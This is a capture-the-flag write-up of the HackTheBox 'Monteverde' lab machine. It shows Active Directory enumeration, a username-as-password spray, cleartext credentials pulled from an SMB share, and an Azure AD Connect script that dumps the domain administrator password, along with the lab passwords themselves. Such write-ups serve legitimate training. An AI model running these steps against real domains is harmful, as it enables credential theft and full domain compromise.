HackTheBox Monteverde

 

Giving a try with enum4linux I was able to get some information about the machine like the usernames, password policies, etc. Finding that right password the right user took me a bit of more time than I expected.This machine is about Azure AD Connect Database Exploit. So in order to get the shell of administrator I need to have a shell of privileged user of the local domain, so that I can perform various attacks.

Let’s get started

$tarting with NMAP Scan to see which ports are open.

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-12 01:39 EDT
    Nmap scan report for monteverde.htb (10.10.10.172)
    Host is up (0.35s latency).
    Not shown: 989 filtered ports
    PORT     STATE SERVICE       VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-12 04:53:41Z)
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds?
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  tcpwrapped
    3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=6/12%Time=5EE31533%P=x86_64-pc-linux-gnu%r(DNSV
    SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
    SF:x04bind\0\0\x10\0\x03");
    Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: -46m18s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-06-12T04:56:07
    |_  start_date: N/A
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 333.84 seconds` 

Enum4linux as the next step if I can see any user names and some juicy information.

    ENUM4LINUX:
    =============================== 
    |    Users on monteverde.htb    |
    =============================== 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
    index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
    index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
    index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
    index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
    index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
    index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
    index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
    index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
    index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
    index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)

    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
    user:[Guest] rid:[0x1f5]
    user:[AAD_987d7f2f57d2] rid:[0x450]
    user:[mhope] rid:[0x641]
    user:[SABatchJobs] rid:[0xa2a]
    user:[svc-ata] rid:[0xa2b]
    user:[svc-bexec] rid:[0xa2c]
    user:[svc-netapp] rid:[0xa2d]
    user:[dgalanos] rid:[0xa35]
    user:[roleary] rid:[0xa36]
    user:[smorgan] rid:[0xa37]
    =========================================== 
    |    Share Enumeration on monteverde.htb    |
    =========================================== 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
    Sharename       Type      Comment
    ---------       ----      -------
    SMB1 disabled -- no workgroup available
    [+] Attempting to map shares on monteverde.htb
    ====================================================== 
    |    Password Policy Information for monteverde.htb    |
    ====================================================== 
    [+] Attaching to monteverde.htb using a NULL share
    [+] Trying protocol 139/SMB...
    [!] Protocol failed: Cannot request session (Called Name:MONTEVERDE.HTB)
    [+] Trying protocol 445/SMB...
    [+] Found domain(s):
    [+] MEGABANK
    [+] Builtin
    [+] Password Info for Domain: MEGABANK
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
    [+] Domain Refuse Password Change: 0
    [+] Domain Password Store Cleartext: 0
    [+] Domain Password Lockout Admins: 0
    [+] Domain Password No Clear Change: 0
    [+] Domain Password No Anon Change: 0
    [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
    [+] Retieved partial password policy with rpcclient:
    Password Complexity: Disabled
    Minimum Password Length: 7
    ================================ 
    |    Groups on monteverde.htb    |
    ================================ 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
    [+] Getting builtin groups:
    group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
    group:[Incoming Forest Trust Builders] rid:[0x22d]
    group:[Windows Authorization Access Group] rid:[0x230]
    group:[Terminal Server License Servers] rid:[0x231]
    group:[Users] rid:[0x221]
    group:[Guests] rid:[0x222]
    group:[Remote Desktop Users] rid:[0x22b]
    group:[Network Configuration Operators] rid:[0x22c]
    group:[Performance Monitor Users] rid:[0x22e]
    group:[Performance Log Users] rid:[0x22f]
    group:[Distributed COM Users] rid:[0x232]
    group:[IIS_IUSRS] rid:[0x238]
    group:[Cryptographic Operators] rid:[0x239]
    group:[Event Log Readers] rid:[0x23d]
    group:[Certificate Service DCOM Access] rid:[0x23e]
    group:[RDS Remote Access Servers] rid:[0x23f]
    group:[RDS Endpoint Servers] rid:[0x240]
    group:[RDS Management Servers] rid:[0x241]
    group:[Hyper-V Administrators] rid:[0x242]
    group:[Access Control Assistance Operators] rid:[0x243]
    group:[Remote Management Users] rid:[0x244]
    group:[Storage Replica Administrators] rid:[0x246]
    =========================================== 
    |    Share Enumeration on monteverde.htb    |
    =========================================== 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
    Sharename       Type      Comment
    ---------       ----      -------
    SMB1 disabled -- no workgroup available
    [+] Attempting to map shares on monteverde.htb
    ====================================================== 
    |    Password Policy Information for monteverde.htb    |
    ====================================================== 
    [+] Attaching to monteverde.htb using a NULL share
    [+] Trying protocol 139/SMB...
    [!] Protocol failed: Cannot request session (Called Name:MONTEVERDE.HTB)
    [+] Trying protocol 445/SMB...
    [+] Found domain(s):
    [+] MEGABANK
    [+] Builtin
    [+] Password Info for Domain: MEGABANK
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
    [+] Domain Refuse Password Change: 0
    [+] Domain Password Store Cleartext: 0
    [+] Domain Password Lockout Admins: 0
    [+] Domain Password No Clear Change: 0
    [+] Domain Password No Anon Change: 0
    [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.
    [+] Retieved partial password policy with rpcclient:
    Password Complexity: Disabled
    Minimum Password Length: 7
    ================================ 
    |    Groups on monteverde.htb    |
    ================================ 
    Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.
    [+] Getting builtin groups:
    group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
    group:[Incoming Forest Trust Builders] rid:[0x22d]
    group:[Windows Authorization Access Group] rid:[0x230]
    group:[Terminal Server License Servers] rid:[0x231]
    group:[Users] rid:[0x221]
    group:[Guests] rid:[0x222]
    group:[Remote Desktop Users] rid:[0x22b]
    group:[Network Configuration Operators] rid:[0x22c]
    group:[Performance Monitor Users] rid:[0x22e]
    group:[Performance Log Users] rid:[0x22f]
    group:[Distributed COM Users] rid:[0x232]
    group:[IIS_IUSRS] rid:[0x238]
    group:[Cryptographic Operators] rid:[0x239]
    group:[Event Log Readers] rid:[0x23d]
    group:[Certificate Service DCOM Access] rid:[0x23e]
    group:[RDS Remote Access Servers] rid:[0x23f]
    group:[RDS Endpoint Servers] rid:[0x240]
    group:[RDS Management Servers] rid:[0x241]
    group:[Hyper-V Administrators] rid:[0x242]
    group:[Access Control Assistance Operators] rid:[0x243]
    group:[Remote Management Users] rid:[0x244]
    group:[Storage Replica Administrators] rid:[0x246]
    [+] Getting local groups:
    group:[Cert Publishers] rid:[0x205]
    group:[RAS and IAS Servers] rid:[0x229]
    group:[Allowed RODC Password Replication Group] rid:[0x23b]
    group:[Denied RODC Password Replication Group] rid:[0x23c]
    group:[DnsAdmins] rid:[0x44d]
    group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
    group:[ADSyncAdmins] rid:[0x451]
    group:[ADSyncOperators] rid:[0x452]
    group:[ADSyncBrowse] rid:[0x453]
    group:[ADSyncPasswordSet] rid:[0x454]

Found a few users with the help of Enum4Linux.

So, to simplyfy the output I used RPCCLIENT for a detailed ennumeration.

    rpcclient $> enumdomusers 
    user:[Guest] rid:[0x1f5]
    user:[AAD_987d7f2f57d2] rid:[0x450]
    user:[mhope] rid:[0x641]
    user:[SABatchJobs] rid:[0xa2a]
    user:[svc-ata] rid:[0xa2b]
    user:[svc-bexec] rid:[0xa2c]
    user:[svc-netapp] rid:[0xa2d]
    user:[dgalanos] rid:[0xa35]
    user:[roleary] rid:[0xa36]
    user:[smorgan] rid:[0xa37]

Quering all the users info using RPCCLIENT, I found that mhopes is the member of AZURE DOMAIN ADMIN’S.

    rpcclient $> enumdomgroups 
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Group Policy Creator Owners] rid:[0x208]
    group:[Cloneable Domain Controllers] rid:[0x20a]
    group:[Protected Users] rid:[0x20d]
    group:[DnsUpdateProxy] rid:[0x44e]
    group:[Azure Admins] rid:[0xa29]
    group:[File Server Admins] rid:[0xa2e]
    group:[Call Recording Admins] rid:[0xa2f]
    group:[Reception] rid:[0xa30]
    group:[Operations] rid:[0xa31]
    group:[Trading] rid:[0xa32]
    group:[HelpDesk] rid:[0xa33]
    group:[Developers] rid:[0xa34]


                
    rpcclient $> queryuser 0x641
    User Name   :   mhope
    Full Name   :   Mike Hope
    Home Drive  :   \\monteverde\users$\mhope
    Dir Drive   :   H:
    Profile Path:
    Logon Script:
    Description :
    Workstations:
    Comment     :
    Remote Dial :
    Logon Time               :      Fri, 12 Jun 2020 05:40:35 EDT
    Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
    Kickoff Time             :      Wed, 13 Sep 30828 22:48:05 EDT
    Password last set Time   :      Thu, 02 Jan 2020 18:40:06 EST
    Password can change Time :      Fri, 03 Jan 2020 18:40:06 EST
    Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
    unknown_2[0..31]...
    user_rid :      0x641
    group_rid:      0x201
    acb_info :      0x00000210
    fields_present: 0x00ffffff
    logon_divs:     168
    bad_password_count:     0x00000000
    logon_count:    0x00000002
    padding1[0..7]...
    logon_hrs[0..21]...

So I quickly made the user list and tries with a different password list(s), But no luck unfortunately. A quick idea popped into my mind and then I used the same username list as the password list for the password spray using crackmapexec.

crackmapexec

    SMB 10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:SABatchJobs STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:mhope STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-ata STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-bexec STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:svc-netapp STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:dgalanos STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:roleary STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:smorgan STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-bexec STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:dgalanos STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE 
    SMB 10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 

Cracking the password of SABatchJobs and using Evil-WinRM didn’t return anything! So I moved on trying with SMB.

SMBCLIENT

    smbclient -L  monteverde.htb -U SABatchJobs
    Enter WORKGROUP\SABatchJobs's password: 
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    azure_uploads   Disk      
    C$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    users$          Disk      
    SMB1 disabled -- no workgroup available

              
    smbclient //monteverde.htb/users$ -U SABatchJobs
    Enter WORKGROUP\SABatchJobs's password: 
    Try "help" to get a list of possible commands.
    smb: \> ls
    .                                   D        0  Fri Jan  3 08:12:48 2020
    ..                                  D        0  Fri Jan  3 08:12:48 2020
    dgalanos                            D        0  Fri Jan  3 08:12:30 2020
    mhope                               D        0  Fri Jan  3 08:41:18 2020
    roleary                             D        0  Fri Jan  3 08:10:30 2020
    smorgan                             D        0  Fri Jan  3 08:10:24 2020
    524031 blocks of size 4096\. 519955 blocks available
    smb: \> cd mhope
    smb: \mhope\> ls
    .                                   D        0  Fri Jan  3 08:41:18 2020
    ..                                  D        0  Fri Jan  3 08:41:18 2020
    azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020
    524031 blocks of size 4096\. 519955 blocks available
    smb: \mhope\> get azure.xml
    getting file \mhope\azure.xml of size 1212 as azure.xml (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec) 

Looking at AZURE.xml file, password of mhope is found!

Then using Evil-WinRM I was able to login as MHOPE.

    cat azure.xml   

    <t>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</t>
    <t>System.Object</t>
    <tostring>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</tostring>

    <dt n="StartDate">2020-01-03T05:35:00.7562298-08:00</dt>

    <dt n="EndDate">2054-01-03T05:35:00.7562298-08:00</dt>

    <g n="KeyId">00000000-0000-0000-0000-000000000000</g>
    <s n="Password">4n0therD4y@n0th3r$</s> 

Getting user.txt

    evil-winrm -i monteverde.htb -u mhope -p 4n0therD4y@n0th3r$

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
    *Evil-WinRM* PS C:\Users\mhope> cd Desktop
    *Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
    [4961************************12f2]

Privilege Escalation

    USER INFORMATION
    ----------------
    User Name      SID
    ============== ============================================
    megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
    GROUP INFORMATION
    -----------------
    Group Name                                  Type             SID                                          Attributes
    =========================================== ================ ============================================ ==================================================
    Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
    BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
    BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
    MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
    NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
    Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
    PRIVILEGES INFORMATION
    ----------------------
    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
    USER CLAIMS INFORMATION
    -----------------------
    User claims unknown.
    Kerberos support for Dynamic Access Control on this device has been disabled. 

Seeing that [mhope] is a member of Azure Admin group [MEGABANK\Azure Admins]. This means mhope must me having the administrator rights on the domain. Looking for the exploit in google for quite a good time I came across a [powershell] script [AzureConnect]. So this script will return the Administrator password in Cleartext format. So I created a new file [adconnect.ps1] with the powershell script in it and uploaded the script.

    *Evil-WinRM* PS C:\Users\mhope\Desktop> upload adconnect.ps1
    Info: Uploading adconnect.ps1 to C:\Users\mhope\Desktop\adconnect.ps1

    Data: 2936 bytes of 2936 bytes copied
    Info: Upload successful!

    *Evil-WinRM* PS C:\Users\mhope\Desktop> dir
    Directory: C:\Users\mhope\Desktop
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    -a----        6/11/2020  11:04 PM           2202 adconnect.ps1
    -ar---         1/3/2020   5:48 AM             32 user.txt` 

This script needs to run in locally as I have a shell as mhope.
To have a more indepth view have a look on the below video.

    *Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./adconnect.ps1
    *Evil-WinRM* PS C:\Users\mhope\Desktop> ./adconnect.ps1
    *Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
    [+] Domain:  MEGABANK.LOCAL
    [+] Username: administrator
    [+]Password: d0m@in4dminyeah! 

Getting root.txt

So, as I got the PASSWORD of Administrator, I can login as Administrator using Evil-WinRM and grab the root flag.

    evil-winrm -i monteverde.htb -u Administrator -p d0m@in4dminyeah!

    Evil-WinRM shell v2.3
    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
    *Evil-WinRM* PS C:\Users\Administrator> cd Desktop
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
    [1290************************a0bc]
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> 

And we get the shell as administrator

If you like my work, please do consider giving me +rep on HACKTHEBOX.

My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968